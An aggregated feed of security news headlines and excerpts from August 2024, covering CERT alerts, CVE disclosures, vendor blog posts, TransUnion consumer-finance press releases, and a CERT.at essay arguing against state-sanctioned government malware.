See how Vectra AI delivers optimal load times for customers across our UI

https://www.vectra.ai/blog/we-just-made-the-vectra-ai-platform-even-better
Riasztás a Nemzeti Népegészségügyi és Gyógyszerészeti Központot (NNK) megszemélyesítő, káros csatolmányú e-mail kapcsán
2024-09-02T08:30:23Z | 1725265823

Tisztelt Ügyfelünk! A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Nemzeti Népegészségügyi és Gyógyszerészeti Központ nevében küldött, káros csatolmányt tartalmazó levéllel kapcsolatban. Intézetünkhöz több bejelentés is érkezett, amely szerint a Nemzeti Népegészségügyi és Gyógyszerészeti Központ nevében, ismeretlen támadók olyan levelet küldtek ki számos intézmény részére, amelyben fertőzött betegségekkel kapcsolatos tájékoztatásra hivatkozva […]

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-a-nemzeti-nepegeszsegugyi-es-gyogyszereszeti-kozpontot-nnk-megszemelyesito-karos-csatolmanyu-e-mail-kapcsan/
How to Build a RACI Matrix for Single-Vendor SASE Success
2024-09-02T06:54:39Z | 1725260079

Selecting the right SASE (Secure Access Service Edge) vendor requires a solid project management tool that fosters collaboration between network and IT security teams. This collaboration, or team unity, will ensure alignment with an organization’s strategic goals while leveraging the respective expertise of stakeholders. Consequently, the selected SASE solution will meet network design, configuration, and... The post How to Build a RACI Matrix for Single-Vendor SASE Success  appeared first on Cato Networks.

https://www.catonetworks.com/blog/build-a-raci-matrix-for-single-vendor-sase-success/
Como a IA pode ser porta de entrada para hackers?
2024-08-31T01:56:35Z | 1725069395

https://nsfocusglobal.com/web-stories/como-a-ia-pode-ser-porta-de-entrada-para-hackers/
Brasileiros são os que mais utilizam IA em 2024
2024-08-30T22:55:00Z | 1725058500

https://nsfocusglobal.com/web-stories/brasileiros-sao-os-que-mais-utilizam-ia-em-2024/
CERT.LV activity review Q2 2024
2024-08-30T17:18:16Z | 1725038296

In Q1 2024, the number of threats and incidents reduced only by 3% compared to the same period in 2023. In addition, it was 5% higher than in the last three quarters of previous year. Latvia has demonstrated a convincing cyber- resilience, and cyber-attacks recorded so far have not had a significant or lasting impact on society.

https://cert.lv/en/2024/08/cert-lv-activity-review-q2-2024
Best Practices to Help Meet PCI DSS v4.0 API Security Compliance
2024-08-30T13:00:00Z | 1725022800

https://www.akamai.com/blog/security/2024/aug/meet-pci-dss-v40-api-security-compliance
From Misuse to Abuse – AI Risks and Attacks
2024-08-29T13:11:12Z | 1724937072

The post From Misuse to Abuse – AI Risks and Attacks appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-from-misuse-to-abuse-ai-risks-and-attacks
Consumer Optimism Hits Two-Year High, Though Generational Divides Emerge
2024-08-29T13:00:31Z | 1724936431

A new report from global information and insights company, TransUnion, shows that consumers are more optimistic about the likely state of their finances over the next 12 months than at any point over the past two and a half years. The latest survey, released as part of TransUnion’s Q2 2024 Consumer Pulse report, finds that 43% of consumers are optimistic about their household finances in the next 12 months. This shows a continued rebound in confidence and is the highest level of optimism TransUnion has recorded since Q4 2021 (48%). James Robinson, managing director of consumer interactive at TransUnion in the UK, said: “As inflation hits the Bank of England's target of 2% for the first time in almost three years, there are signs of hope among consumers that the coming year will bring an easing of financial pressures. But the cost-of-living stresses that built up in recent years won’t be disappearing right away and that legacy will affect some households more severely than others, meaning we’re seeing a complex, divided picture of recovery.” Consumer optimism is not being felt equally across the board, with a steep generational divide both in terms of actual financial health and consumer sentiment. Bucking the overall trend, 73% of Gen X were not optimistic about their household finances in the next 12 months.   This divide might be explained by reported differences in income growth; 37% of Millennials said their household incomes were keeping up with the rate of inflation, the highest of any generation – this is opposed to only 15% of Gen X, the lowest of any generation. These attitudes reflect ONS figures suggesting any real-terms income gains are marginal. With wage growth slightly above current inflation levels at 2.3% year-over-year (YoY) as of April 2024,i financial stresses persist in the present for many, even considering growing optimism. Meanwhile, housing (mortgage and rent costs) ranked amongst the top concerns affecting consumer household finances in the next six months for all generations except Baby Boomers. In fact, 68% of Gen Z ranked housing costs in their top three financial concerns, along with a majority of Millennials and Gen X. The impact of rental costs looks to be landing squarely on low earners, who are significantly more likely to be tenants.ii As such, it‘s important not to overlook signs of financial vulnerability, even as the macro picture suggests hope for the future. Against this backdrop, optimism is yet to translate to spending for many consumers. Nearly half (47%) of respondents plan to decrease spending on discretionary items like dining out, travel, entertainment, while more than a third won’t spend as much on large purchases like appliances and cars (38%), or retail purchases like clothing, electronics or durable goods (36%) in the next three months. Notes:Unless otherwise stated, all figures are from TransUnion’s Consumer Pulse study, which is based on a survey of 1,000 adults in the UK between 1 and 7 May 2024.  Generations are defined in this research as follows: Gen Z, 18–26 years old; Millennials, 27–42 years old; Gen X, 43–58 years old; and Baby Boomers, age 59 and above. i Office of National Statistics: Employment in the UK - Office for National Statisticsii In TransUnion’s Q2 2024 Consumer Pulse survey, 45% of low earners said they were currently paying rent compared to 28% of high earners. In this survey, low earners are defined as households with an income of less than £30k per year, and high earners as those with an income of £80k or more per year.

https://newsroom.transunion.co.uk/consumer-optimism-hits-two-year-high-though-generational-divides-emerge/
Inside the NIST Cybersecurity Framework 2.0 and API Security
2024-08-29T13:00:00Z | 1724936400

https://www.akamai.com/blog/security/2024/aug/nist-cybersecurity-framework-and-api-security
Security Alert (A24-08-14): Multiple Vulnerabilities in Google Chrome
2024-08-29T04:00:00Z | 1724904000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-08-15): Multiple Vulnerabilities in Cisco Products
2024-08-29T04:00:00Z | 1724904000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Vulnerabilities in HyperView Geoportal Toolkit software
2024-08-28T13:00:00Z | 1724850000

CERT Polska has received a report about 2 vulnerabilities (CVE-2024-6449 and CVE-2024-6450) found in HyperView Geoportal Toolkit software.

https://cert.pl/en/posts/2024/08/CVE-2024-6449/
Vulnerability in ConnX ESP HR Management software
2024-08-28T11:00:00Z | 1724842800

Stored XSS vulnerability (CVE-2024-7269) has been found in ConnX ESP HR Management software.

https://cert.pl/en/posts/2024/08/CVE-2024-7269/
Riding the Wave: Why Channel Partners Can’t Afford to Ignore the SASE Surge
2024-08-28T10:07:26Z | 1724839646

In the ever-evolving landscape of IT services, channel partners like solution integrators, service providers, managed service providers (MSPs), and telecommunications companies have long played a crucial role in delivering enterprise networking and security solutions. However, a subtle yet powerful shift is emerging that threatens to disrupt this status quo. Single-vendor SASE (Secure Access Service Edge)... The post Riding the Wave: Why Channel Partners Can’t Afford to Ignore the SASE Surge  appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-channel-partners-cant-afford-to-ignore-the-sase-surge/
National Cyber Security Centre's weekly review – 34/2024
2024-08-28T07:16:10Z | 1724829370

This week we’ll cover topics such as the ‘Be vigilant on the web!’ campaign and we’ve collected snippets from the Assembly event. We also look at current scams.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-342024
National Cyber Security Centre's weekly review – 34/2024
2024-08-28T07:16:10Z | 1724829370

This week we’ll cover topics such as the ‘Be vigilant on the web!’ campaign and we’ve collected snippets from the Assembly event. We also look at current scams.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-342024
Akamai Named a Leader in The Forrester Wave?: Microsegmentation Solutions, Q3 2024
2024-08-28T07:00:00Z | 1724828400

https://www.akamai.com/blog/security/2024/aug/2024-akamai-named-a-leader-in-the-forrester-wave
Beware the Unpatchable: Corona Mirai Botnet Spreads via Zero-Day
2024-08-28T05:00:00Z | 1724821200

https://www.akamai.com/blog/security-research/2024/aug/2024-corona-mirai-botnet-infects-zero-day-sirt
Provisioning cloud infrastructure the wrong way, but faster
2024-08-27T13:00:06Z | 1724763606

Today we’re going to provision some cloud infrastructure the Max Power way: by combining automation with unchecked AI output. Unfortunately, this method produces cloud infrastructure code that 1) works and 2) has terrible security properties. In a nutshell, AI-based tools like Claude and ChatGPT readily provide extremely bad cloud infrastructure provisioning code, […]

https://blog.trailofbits.com/2024/08/27/provisioning-cloud-infrastructure-the-wrong-way-but-faster/
Hillstone X25812 Data Center Firewall
2024-08-27T09:52:56Z | 1724752376

If you’re looking for a high-performing and reliable firewall solution for your data center, the HillstoneX25812 Data Center Firewall is a perfect choice. Designed with internet service providers,carriers, and large enterprises in mind, this firewall offers top-of-the-line protection and availability.With its fully distributed architecture, it delivers ultra-high throughput, concurrent connections, andnew sessions, allowing you to […] The post Hillstone X25812 Data Center Firewall appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/resources/hillstone-x25812-data-center-firewalls/
Hillstone X25803 Data Center Firewall
2024-08-27T09:52:25Z | 1724752345

The Hillstone X25803 Data Center Firewall is a high-performance DCFW that provides exceptionalprotection and high availability. It is perfectly crafted to meet the stringent security needs of largeenterprises, service providers, and government sectors. With its fully distributed architecture, itdelivers high throughput, concurrent connections, and new sessions, allowing you to keep yourdata center running smoothly. In […] The post Hillstone X25803 Data Center Firewall appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/resources/hillstone-x25803-data-center-firewall/
Hillstone Networks Launches StoneOS 5.5R11 to Enhance Threat Resilience and Business Efficiency
2024-08-27T07:42:09Z | 1724744529

Featuring 200 new functionalities and improvements designed to strengthen threat protection and expand the core operating system SANTA CLARA, Calif., August 27, 2024 /PRNewswire/ — Hillstone Networks, a leader in cybersecurity solutions, has launched the latest version of its operating system, StoneOS 5.5R11. This update includes over 200 new functionalities and improvements designed to enhance threat protection […] The post Hillstone Networks Launches StoneOS 5.5R11 to Enhance Threat Resilience and Business Efficiency appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/company/press-releases/hillstone-networks-launches-stoneos-5-5r11-to-enhance-threat-resilience-and-business-efficiency/
Cato CTRL Threat Actor Profile: Yashechka
2024-08-26T12:15:00Z | 1724674500

Executive Summary To further raise awareness on threat actor activity in the dark web and hacking communities, today we are introducing the Cato CTRL Threat Actor Profile. This will be a blog series that profiles various threat actors and documents notable activity that we are observing. Our inaugural Cato CTRL Threat Actor Profile is on... The post Cato CTRL Threat Actor Profile: Yashechka appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-ctrl-threat-actor-profile-yashechka/
Understand Third-Party OT Risks and Learn The Best OT Security
2024-08-25T07:00:00Z | 1724569200

Your operational technology (OT) network’s security is only as strong as the weakest link in your supply chain. Threat actors are increasingly finding ways to locate and break that weakest link.

https://blog.scadafence.com/understand-third-party-ot-risks-how-tackle
American Radio Relay League Paid $1 Million Ransom
2024-08-24T10:32:41Z | 1724495561

The American Radio Relay League (ARRL), a prominent national association for amateur radio enthusiasts, recently

https://virtualattacks.com/american-radio-relay-league-paid-1-million-ransom/
2024 Events and 2025 Preview
2024-08-23T12:00:00Z | 1724414400

Greetings FIRST Community, 2024 has been an exciting year of memorable programming, including the annual conference, which visited Japan in June! With just four months before the end of the year, we want to highlight the content and opportunities still to come.

https://www.first.org/newsroom/digest/202407
High Threat Security Alert (A24-08-12): Multiple Vulnerabilities in Microsoft Edge
2024-08-23T04:00:00Z | 1724385600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-08-13): Vulnerability in SonicWall Products
2024-08-23T04:00:00Z | 1724385600

SonicWall released a security advisory to address a vulnerability in SonicWall systems.

https://www.govcert.gov.hk/en/alerts_detail.php
SonicOS Improper Access Control Vulnerability
2024-08-22T18:43:35Z | 1724352215

An improper access control vulnerability has been identified in the SonicWall SonicOS management access and SSLVPN, potentially leading to unauthorized resource access and in specific conditions, causing the firewall to crash. This issue affects SonicWall Gen 5 and Gen 6 devices, as well as Gen 7 devices running SonicOS 7.0.1-5035 and older versions.This vulnerability is potentially being exploited in the wild. Please apply the patch as soon as possible for affected products. The latest patch builds are available for download on mysonicwall.com CVE: CVE-2024-40766 Last updated: Nov. 20, 2024, 1:18 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015
How Securing APIs Factors into DORA Compliance
2024-08-22T13:00:00Z | 1724331600

https://www.akamai.com/blog/security/2024/aug/how-securing-apis-factors-into-dora-compliance
Aryaka Partners Drive Record Sales Growth in FY ’24
2024-08-22T12:00:32Z | 1724328032

Santa Clara, CA – August 22, 2024 – Aryaka®, the leader in and first to deliver Unified SASE as a Service, today announced significant growth in partner-led sales of its Unified SASE as a Service solution to businesses worldwide. Partners increased sales of Aryaka solutions by 26 percent fiscal year over year, accounting for two-thirds... The post Aryaka Partners Drive Record Sales Growth in FY ’24 appeared first on Aryaka.

https://www.aryaka.com/press/aryaka-partners-sales-growth-fy24/
Security Alert (A24-08-10): Multiple Vulnerabilities in Cisco Products
2024-08-22T04:00:00Z | 1724299200

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-08-11): Multiple Vulnerabilities in Google Chrome
2024-08-22T04:00:00Z | 1724299200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
“YOLO” is not a valid hash construction
2024-08-21T13:00:51Z | 1724245251

Among the cryptographic missteps we see at Trail of Bits, “let’s build our own tool out of a hash function” is one of the most common. Clients have a problem along the lines of “we need to hash a bunch of different values together” or “we need a MAC” or “we need […]

https://blog.trailofbits.com/2024/08/21/yolo-is-not-a-valid-hash-construction/
Embed API Security into Regulatory Compliance: Six Examples to Watch
2024-08-21T13:00:00Z | 1724245200

Read about how to meet API-related requirements in six key regulations and frameworks to better protect your organization.

https://www.akamai.com/blog/security/2024/aug/embed-api-security-into-regulatory-compliance-six-examples
BLUUID: Firewallas, Diabetics, And… Bluetooth
2024-08-21T00:00:00Z | 1724198400

Dive into the fascinating and overlooked realm of Bluetooth Low Energy (BTLE) security in GreyNoise Labs' latest blog post. Learn techniques for remote device identification, uncover vulnerabilities, and explore the broader implications for IoT and healthcare.

https://www.greynoise.io/blog/bluuid-firewallas-diabetics-and-bluetooth
Hacking as a pathway to building better Products
2024-08-20T13:31:55Z | 1724160715

Most security products are terrible. For years our industry has managed to get by because our products were mandated by someone or some regulation, and users were trained to accept that security and usability were necessary trade-offs. This was just the prevailing truth. One of the reasons we always promote hacker-led companies is because hackers delight in challenging accepted truths. We think this applies as much to product design as it does to smashing the stack. In a few months, Thinkst will celebrate Canary’s ten-year anniversary. A decade of building the world’s best honeypot, and one of the world’s most loved security tools. Within the company, several people count themselves as current or ex-hackers. And, according to us, our kids, and our love page, Canary doesn’t suck. In a recent Hacker News thread discussing one design choice we made, a commenter picked up that our devices use similar tunnelling techniques to nefarious software. Well spotted! In fact, there are a bunch of design and technology choices we’ve made on Canary, influenced heavily by our offensive security experience. We wanted to explore the way hacking influenced our design of Canary. We took ideas from exploitation, C2 tunnelling, web attacks, and more. […]

https://blog.thinkst.com/2024/08/hacking-as-a-pathway-to-building-better-products.html
Edge Computing and 5G: Emerging Technology Shaping the Future of IT
2024-08-20T13:00:00Z | 1724158800

Learn how and why enterprise businesses are using edge computing and 5G to deliver better digital experiences for their customers.

https://www.akamai.com/blog/edge/2024/aug/edge-computing-5g-emerging-technology-shaping-future-it
Another round: Government malware & digital surveillance
2024-08-20T10:57:08Z | 1724151428

Not just the seasons, or my attempts to appear in the office in an outfit other than holey conference shirts, shorts and Birkenstock slippers that are cyclical. The desire of politicians for a "government trojan" or surveillance of digital communication seemingly follows a constant rhythm as well - and apparently it's that time again. Federal Chancellor Karl Nehammer is making the surveillance of digital communication a fixed condition for a future political coalition. A government-sanctioned malware has resurfaced on the political table again as well. What the government thinks about such a digital trojan horse could clearly be seen in a legislative draft circulating in the media. Allegedly, this draft was supposed to be in accordance with the restrictions placed on digital surveillance by the Constitutional Court back in 2019. Although the draft was, fortunately, rejected, I would still like to discuss some parts of it. Mainly because I assume that we will be having this very same conversation again in a few months' time. Specifically, the draft talks about the monitoring of messages that are "sent, transmitted or received in encrypted form" by "introducing a program into a computer system of the person concerned". I find the given need to "technically ensure that only messages sent or received within a specified, pre-authorized time period are monitored" particularly interesting. According to legal experts, this would enable constitutionally compliant surveillance because the surveillance software available on the market is already "much more focused on chat messages" and no longer "applicable to the entire cell phone". Whatever that means. Personally, I would wish that not just  lawyers were consulted on this topic, but that security experts and technicians were also allowed to contribute their part. Letting legal experts make technical judgments is like letting me make legal assessments - not exactly optimal As a technician, I must clearly disagree with the lawyers here. The current solutions from various providers of commercial spyware (which would probably be used, I do not assume that the responsible authorities in Austria would develop their own solutions) are all not designed to monitor only certain applications. As far as I know, there is no spyware that monitors (for example) only Telegram or only Viber. Of course, it would be possible for the provider to configure its system in such a way that only messages from (for example) Telegram or Viber are displayed to customers. However, this is an organizational safeguard, not a technical guarantee that only relevant messages are monitored. The same applies to the requirement that only messages within a monitoring period specified in an order may be targeted. Compromising an end user device with commercial spyware always means that the privacy of the person concerned is completely compromised. Keyword compromised: I assume that "introducing a program into a computer system of the person concerned" does not mean that the persons concerned go to their local police station, hand in their cell phone or computer (including the necessary credentials to access them) and go for a coffee around the corner while the officers "introduce" the "program". At least I hope that's not what is meant. No, what is being talked about here is that security vulnerabilities are exploited to install malware on the devices. For security gaps to be exploited, the vulnerabilities must remain unpatched. At the same time, however, this also means that a system remains insecure in the broadest sense. And other actors with (depending on how you look at it, "even") more malicious intentions can also abuse the vulnerabilities in question. This fact, especially in view of the upcoming implementation of NIS-2, that the state is putting itself in a dilemma here: The state wants IT systems to be secure so that citizens, organizations, companies and authorities can communicate through them confidentially and exchange data securely. This requires, among other things, that the systems are protected according to the best available standards and technology. If there are vulnerabilities, these must be patched as quickly as possible or reported to the manufacturer so that they can provide patches. The state wants to gain insight into the communications and data of suspects in order to prevent and / or solve crimes, terrorism or espionage. This presupposes, among other things, that the systems used by the suspects have vulnerabilities that can be exploited to place software on the suspects' devices to enable the insights. It will not be possible to completely fulfill both requirements. My colleague Otmar Lendl already pointed this out seven years ago in an article on a very similar topic. In principle, I understand the authorities' desire to gain insight into the communications of suspects (the FBI even felt this desire so strongly that they simply made their own messenger available to the criminals). But the way politicians envision it - clean, clearly defined, secure, safeguarding fundamental rights - is simply not possible. No matter how often they wish it were. Even if I am not a criminalist, investigator or expert on terrorism, I can think of measures off the top of my head that are very likely to be more promising and are also much easier to reconcile with constitutional law. I know of colleagues in federal employment who had to wait several months to get the peripherals they needed for their work computers due to outdated processes and the miserably slow grindings of bureaucracy. Or cases in which one department is almost drowning in the amount of work to be done while another team with the same technical expertise is bored into "boreout", but for whatever reason is not allowed to provide support. In contact with CSIRTs and law enforcement agencies from other countries, we hear time and again that cooperation with institutions from Austria works well - when it does come about, because motivated people throw in the towel in frustration with alarming regularity. When I talk to people I know who work in social and probation services, the massive lack of resources is a regular topic. I'm going to go out on a limb and say that with all the resources, time and energy (and probably a certain amount of budget) that has gone into the issue of messenger surveillance and state malware, many other things could have been improved that would have had a more lasting positive effect on our security. To conclude with a very personal example: although temporal correlation naturally does not imply a causal link, I cannot help suspecting that the topic is being brought to the boil in connection with the foiled attack attempts surrounding the Taylor Swift concerts in Vienna. In my (still) younger years, I worked for some time as a security guard for major events. And even back then, the only requirement for employment was a willingness to work nights in the pouring rain for €6.50 an hour. As a result, I guarded the back entrance of a well-known cultural institution with two colleagues, one of whom trained team kickboxing on dirt tracks in his spare time in the context of a Viennese soccer club, while my second colleague had to cover up some of his tattoos to avoid coming into conflict with various sections of the VbtG. That seemed strange to me at the time. My eyes widened even more a few years ago when it became known that during the committee of inquiry into the BVT affair, a security employee with close links to a right-wing extremist who had been known to the authorities for decades was working in parliament. Apparently, in this case too, no real checks were carried out on who was employed for €6.50 per hour (hopefully adjusted for inflation). After all, this led to the creation of "clear and binding security standards" for security companies in the Turquoise-Green government program from 2020. As part of the investigations following the cancellation of Taylor Swift's concerts in Vienna a few weeks ago, it emerged that eight of the security staff employed at the concerts had already been found guilty of jihadism. It seems that the security standards haven't quite worked out so far. The point I want to make is that government malware is not the solution. It is not even one of several possible solutions, like the examples I mentioned in the previous paragraphs. The "Bundestrojaner" is a problem. The targeted monitoring of individual conversations or just certain chat applications while at the same time avoiding excessive invasion of privacy and ensuring the technical security of monitored devices is not possible in the way the decision-makers imagine. I wish this didn't have to be explained anew every few years.

https://www.cert.at/en/blog/2024/8/another-round-government-malware-digital-surveillance
National Cyber Security Centre's weekly review – 33/2024
2024-08-20T09:49:29Z | 1724147369

This week we take a look at what ransomware is and how you can protect yourself against it.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-332024
National Cyber Security Centre's weekly review – 33/2024
2024-08-20T09:49:29Z | 1724147369

This week we take a look at what ransomware is and how you can protect yourself against it.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-332024
Security alert Zabbix CVE-2024-22116: Stormshield Products Response
2024-08-20T06:21:21Z | 1724134881

A new critical Remote Code Execution (RCE) vulnerability impacting Zabbix has been reported. It has been assigned the reference CVE-2024-22116 and a CVSS 3.1 score of 9.9. The Stormshield Customer Security Lab details our protection offerings. This vulnerability impacts the following versions of the product:... The post Security alert Zabbix CVE-2024-22116: Stormshield Products Response appeared first on Stormshield.

https://www.stormshield.com/news/security-alert-zabbix-cve-2024-22116-stormshield-products-response/
Do SOC Professionals Know They’re Spending Almost Two Hours a Day Investigating False Positives? by Zoey Chu
2024-08-20T00:00:00Z | 1724112000

SOC professionals spend nearly 2 hours daily investigating false positives. Learn how Vectra AI can help optimize and automate their workflow.

https://www.vectra.ai/blog/do-soc-professionals-know-theyre-spending-almost-two-hours-a-day-investigating-false-positives
Unveiling Vulnerability Insights from the CISA KEV Catalog at BSidesLV
2024-08-20T00:00:00Z | 1724112000

The CISA KEV Catalog is a crucial resource for organizations to understand and prioritize actively exploited vulnerabilities. This blog post delves into three key insights from an analysis of the KEV Catalog, offering valuable strategies to enhance vulnerability management practices.

https://www.greynoise.io/blog/unveiling-vulnerability-insights-from-the-cisa-kev-catalog-at-bsideslv
How We Transformed Akamai from a CDN to a Cloud and Security Company
2024-08-19T14:00:00Z | 1724076000

https://www.akamai.com/blog/security/2024/aug/transformed-akamai-cdn-cloud-security-company
TransUnion Appoints Sharon Naidoo as CFO Across UK and Europe
2024-08-19T09:29:11Z | 1724059751

TransUnion, a global information and insights company and one of the UK’s leading credit reference agencies, has welcomed Sharon Naidoo as its new Chief Financial Officer (CFO) for the UK and Europe.  Sharon will be joining the UK executive team, where she will be responsible for overseeing the business’s finance and accounting activities for the region, helping to drive TransUnion’s ambitious growth strategy. She joins the UK and Europe team from her role as CFO for TransUnion Africa, bringing her experience across diverse industries such as banking, chemicals, pharmaceuticals and consumer packaged goods to the role.  Speaking on her appointment, Sharon said: “I’m excited to take on this new role and to be supporting TransUnion’s commitment to using data and insights to help our customers and consumers navigate a fast-changing modern business environment – that's what we call 'Information for Good'. I'm also looking forward to working with the UK & Europe Executive team to drive our ambitious growth strategy, as we look to tackle the challenges and opportunities that will help our region realise its potential." “Sharon brings a wealth of experience and leadership to TransUnion’s UK and Europe business, including her combined passions for innovative finance solutions and people leadership,” said David Gilbert, senior vice president international CFO at TransUnion. “Her talent for providing accurate and relevant information and insights, along with her significant project management skills, is sure to add great momentum to our growth in the region.” Sharon joined TransUnion in 2021, is a qualified chartered accountant and holds a master’s degree in financial management, along with 23 years’ experience in corporate finance, financial planning and analysis, strategy, mergers and acquisitions, accounting, and operations. She was nominated in South Africa’s CFO of the Year awards programme in 2023, when she was named the Transformational CFO of the Year.

https://newsroom.transunion.co.uk/transunion-appoints-sharon-naidoo-as-cfo-across-uk-and-europe/
Akamai?s Environmental Management System Meets the ISO 14001 Standard
2024-08-19T05:00:00Z | 1724043600

https://www.akamai.com/blog/sustainability/2024/aug/akamais-environmental-management-system-meets-iso-14001-standard
Microsoft Excel for macOS library injection vulnerability
2024-08-19T00:00:00Z | 1724025600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1976
Microsoft Teams (work or school) for macOS WebView.app helper app library injection vulnerability
2024-08-19T00:00:00Z | 1724025600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1990
Microsoft Word for macOS library injection vulnerability
2024-08-19T00:00:00Z | 1724025600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1977
Microsoft OneNote for macOS library injection vulnerability
2024-08-19T00:00:00Z | 1724025600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1975
Microsoft Outlook for macOS library injection vulnerability
2024-08-19T00:00:00Z | 1724025600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1972
Microsoft Teams (work or school) for macOS library injection vulnerability
2024-08-19T00:00:00Z | 1724025600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1973
Microsoft PowerPoint for macOS library injection vulnerability
2024-08-19T00:00:00Z | 1724025600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1974
Microsoft Teams (work or school) for macOS com.microsoft.teams2.modulehost.app helper app library injection vulnerability
2024-08-19T00:00:00Z | 1724025600

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1991
SASE Deployment Made Simple with Cato
2024-08-18T14:09:41Z | 1723990181

The post SASE Deployment Made Simple with Cato appeared first on Cato Networks.

https://www.catonetworks.com/resources/sase-deployment-made-simple-with-cato/
Aryaka Named to The Channel Company’s MES Midmarket 100 List
2024-08-16T10:26:16Z | 1723803976

SANTA CLARA, California – August 16, 2024 – Aryaka®, the leader and first to deliver Unified SASE as a Service, announced today that MES Computing®, a brand of The Channel Company, has named Aryaka to its 2024 MES Midmarket 100 list. The MES Midmarket 100 list recognizes forward-thinking technology providers offering products and services that... The post Aryaka Named to The Channel Company’s MES Midmarket 100 List appeared first on Aryaka.

https://www.aryaka.com/press/aryaka-named-to-the-channel-companys-mes-midmarket-100-list/
Consumers Still Feeling Long-Tail Pinch of Inflation as Credit Card Spending Grows
2024-08-16T10:06:54Z | 1723802814

James O’Donnell, director of research & consulting at TransUnion in the UK, comments on the recent UK Finance Card Spending report: “The latest UK Finance card spending report covering May 2024 shows another steady year-on-year rise in credit card spend of 1.4%, and a similar rise in the number of credit card transactions, growing at just 1.3%. However, outstanding balances grew faster, with an 8.5% rise. “What’s more, we’re still seeing almost half (48.9%) of outstanding balances incurring interest, compounding an already difficult financial situation for stressed consumers. This is no surprise, with nearly half (46%) of households reporting that their wages are not keeping up with inflation according to TransUnion’s Q2 Consumer Pulse survey. This leaves consumers more reliant on credit to plug gaps for everyday expenses while this lag persists – particularly as more than a third (36%) report they are spending almost everything they earn each month. “The ability to access and manage credit is crucial for UK households, but providers need to make sure they are lending responsibly in a time where the financial picture is constantly changing. Financial institutions need to be calling on the very latest tools and information to ensure they are getting a comprehensive view of every consumer. This will ultimately help promote financial wellbeing as the nation continues to tackle challenges like increased unemployment, high economic inactivity, high interest rates, and low GDP growth.”

https://newsroom.transunion.co.uk/consumers-still-feeling-long-tail-pinch-of-inflation-as-credit-card-spending-grows/
Akamai?s Perspective on August?s Patch Tuesday 2024
2024-08-16T05:00:00Z | 1723784400

https://www.akamai.com/blog/security-research/2024/aug/akamai-perspective-patch-tuesday-august-2024
Security Alert (A24-08-09): Multiple Vulnerabilities in Fortinet Products
2024-08-16T04:00:00Z | 1723780800

Fortinet released security advisories to address multiple vulnerabilities in Fortinet systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Cato CTRL Threat Brief: CVE-2024-38077 – Windows Remote Desktop Licensing Service RCE Vulnerability (“MadLicense“)
2024-08-15T16:12:52Z | 1723738372

Executive Summary  Recently, security researchers  published a proof of concept (PoC) for a critical remote code execution (RCE) vulnerability in Windows Server (CVSS score 9.8), ranging all the way from Windows Server 2000 up to 2025. The vulnerable component is the Remote Desktop Licensing service, often deployed and enabled on Windows Servers using Remote Desktop... The post Cato CTRL Threat Brief: CVE-2024-38077 – Windows Remote Desktop Licensing Service RCE Vulnerability (“MadLicense“)   appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-ctrl-threat-brief-cve-2024-38077-windows-remote-desktop-licensing-service-rce-vulnerability-madlicense/
How we built the Pyramid!
2024-08-15T15:31:57Z | 1723735917

In 2019, we created (and wrote about) our Skyball pyramid – a cute way to stack the super-bouncy balls we give away at conferences. This year we took it up a notch (thanks to Andrew bringing out SCR2!) Like the previous version, we can now make arbitrarily sized pyramids (which also allows us to shrink the base as we start to run out of balls). More importantly though.. Moar Birds! It’s tiny, but it’s one of those things we love.  Most people who visit the booth won’t notice the pyramid-base and certainly very few will care too much for our custom bird-joints.. but we will.. and do..  (We doubt anyone will use it, but if you wanted to, you can grab the STL files here)

https://blog.thinkst.com/2024/08/how-we-built-the-pyramid.html
CVE-2024-6098
2024-08-15T14:38:00Z | 1723732680

CWE-770: Allocation of Resources Without Limits or Throttling When performing an online tag generation to devices which communicate using the ControlLogix protocol, a machine-in-the-middle, or a device that is not configured correctly, could deliver a response leading to unrestricted or unregulated resource allocation. This could cause a denial-of-service condition and crash the Kepware application. By default, these functions are turned off, yet they remain accessible for users who recognize and require their advantages. PTC recommends users take a defense-in-depth stance with regards to their manufacturing networks ensuring proper access control is maintained. Additionally, proper adherence to the Kepware Secure Deployment Guide will minimize this threat through accurate configuration and use of the product.

https://claroty.com/team82/disclosure-dashboard/cve-2024-6098
The Noname Security 3.34 Update Includes Major Enhancements
2024-08-15T14:00:00Z | 1723730400

https://www.akamai.com/blog/security/2024/aug/the-noname-security-3-34-update
We wrote the code, and the code won
2024-08-15T11:50:31Z | 1723722631

